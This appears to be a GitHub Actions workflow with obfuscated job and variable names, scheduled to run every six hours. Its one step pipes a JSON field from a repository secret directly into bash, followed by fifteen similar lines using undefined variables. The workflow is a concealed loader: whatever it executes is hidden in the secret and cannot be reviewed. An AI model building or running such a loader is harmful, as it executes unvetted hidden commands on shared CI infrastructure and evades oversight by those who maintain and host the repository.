name: zhangshun19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '54 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangshun19871010
        env:
          xu8: ${{ secrets.xu8 }}
        run: |
          echo $xu8 | jq -r .d62 | /bin/bash
          echo $uasr75 | jq -r .tm3 | /bin/bash
          echo $qebg70 | jq -r .vkmby862 | /bin/bash
          echo $uyu4284 | jq -r .gxu3641 | /bin/bash
          echo $c53238 | jq -r .nxc85 | /bin/bash
          echo $ybvao17506 | jq -r .j259 | /bin/bash
          echo $lgqk0318 | jq -r .rsfp0279 | /bin/bash
          echo $u6 | jq -r .bfta73903 | /bin/bash
          echo $gdrj4 | jq -r .xksj5 | /bin/bash
          echo $ifskf8 | jq -r .u439 | /bin/bash
          echo $zsce799 | jq -r .ikq18 | /bin/bash
          echo $dfq90 | jq -r .wrnlx79892 | /bin/bash
          echo $t88187 | jq -r .bshbf14638 | /bin/bash
          echo $jzihi34 | jq -r .gmxum82093 | /bin/bash
          echo $s965 | jq -r .fvxvm5 | /bin/bash
          echo $jw87 | jq -r .grsdz3 | /bin/bash

